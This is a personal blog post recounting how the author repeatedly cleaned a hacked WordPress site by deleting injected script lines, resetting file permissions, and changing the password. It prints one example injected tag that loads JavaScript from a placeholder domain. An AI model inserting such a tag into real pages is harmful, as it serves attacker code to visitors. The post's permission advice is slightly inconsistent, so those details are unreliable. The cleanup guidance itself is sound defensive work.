Cleaning WordPress Malware
I was hacked. I cleaned it. I was hacked. I cleaned it. I was hacked…
All told, I think it was 4 times before I stopped the attacks. I don’t like to mess with IT-type issues, least of all security issues, so when something like this comes up, I don’t know what I don’t know, and it takes me some time to learn enough to deal with the issue completely. Before I describe what I did to finally fix things once and for all (knock on wood), let me describe my naivety, because I suspect I am not the only one who suffers from it.
First, I never worried too much about security. With three people reading my blog on a semi-regular basis (hi again Dad), I figured “who would want to hack my site?” Bots don’t care about readership. Second, I figured my password was secure; I had a pretty clever password, wasn’t even in English (and see aforementioned comment on readership). Bots are multi-lingual. When I cleaned the site the first time, I figured I’d be safe for a while – how concerned would the hacker be to reinfect my little old site again so quickly? Bots work 24×7. And there are lots of them. No, I didn’t really believe any of these false assumptions, you think about the issue for, oh, maybe a microsecond and it’s clear exactly how naive these assumptions are. So beware – if you have a site on the World Wide Web, you are a target for hackers.
The First Sign of Trouble
I first became aware of the hack from my Dad (see aforementioned comment on readership) when he said that Google had reported to him that my site was compromised. I now believe that my site had been compromised for far longer than I knew – it was only when Google checked it out and started reporting its findings that I had been alerted. I’m not sure exactly when Google launched this service but, based on my experience, I am betting it was within the last 6 months or so. After I cleaned my site the first time I used Google Web Master Tools to request a re-evaluation of my site – you must have a google account. I got a clean bill of health but alas, a couple of weeks later I was blacklisted again; sure enough, the infection was back. I’ll say more about ALL of the steps I took to finally rid the site of the infection “for good,” but first, kudos to Google – nice service those web master tools; easy to use, seemingly complete. Good stuff.
How I fixed it
Fortunately, in the end, the cleaning procedure is very straight-forward (disclaimer: This statement applies to the type of attack that I specifically had. I have no doubt that there are other hacks that are MUCH more difficult to clean up.) You don’t have to download any special software (you will need an ftp client, but you should have that anyway), or generate any long log files that are then posted to some forum where a wizard will then give you five other free software packages to download and run (those things always scare me away). You need to be able to edit files (really simple edits), change some file permissions, and set your password for the site. Oh, and one other comment: security by obscurity is never a good idea (see aforementioned comments on bots) – sites that suggest you remove all mention of “WordPress” from your pages are being naive, even after thinking about it for far longer than a microsecond.
Okay, so on to the steps:
- Edit the files. The type of infection I had was really simple – some of my .html files had a line or more of the following form inserted into them:
<script src=”http://some.domain.com/somefilename.js”></script>
I was lucky that in most cases the lines were at the top of the file, though in once instance the hack was a bit more clever and inserted the line more centrally located. BTW, there are lots and lots of examples on the web about more clever insertions that are more obfuscated, but if you are editing the files by hand, even those should be relatively easy to spot. So, I edited each of the infected files (see below on the list of infected files I had) and deleted these lines. - Set file permissions. In a WordPress site, the .html and .php files typically have permissions that allow the owner and group read/write access and the world to have read only access. As a result of the hack, the file permissions for the compromised files allowed the world write access. My web site hosting company doesn’t provide any interface that allows me to view or change file permissions so I used Filezilla – you’ll need to set the file permissions numerically – you want to set the value to 644.
- Make sure you get all infected files. I had files infected both in my WordPress and in my phpMyAdmin directories. The full list of files I cleaned (from the root of my directory structure) is:
- index.html
- /blog/index.php
- /blog/wp-admin/index.php
- /blog/wp-admin/network/index.php
- /blog/wp-admin/user/index.php
- /blog/wp-content/index.php
- /blog/wp-content/plugins/index.php
- /blog/wp-content/themes/index.php
- /blog/wp-content/themes/classic/index.php
- /blog/wp-content/themes/constructor/index.php
- /blog/wp-content/themes/constructor/home.php
- /blog/wp-content/themes/default/index.php
- /blog/wp-content/themes/pool/index.php
- /phpMyAdmin/index.php
- /phpMyAdmin/main.php
Of course, your mileage may vary, particularly in the themes area – check all of the php files in the themes you have installed for files that have permissions other than -rw-rw-r–.
- Change your password. I confess (in the hopes that my ineptness will benefit someone else), the first few times I cleaned my site I didn’t do this. I believe that changing my password after the cleanup is what finally twarted further attacks. Change your password, and change it to something that can’t be found in a dictionary somewhere.
Share Your Thoughts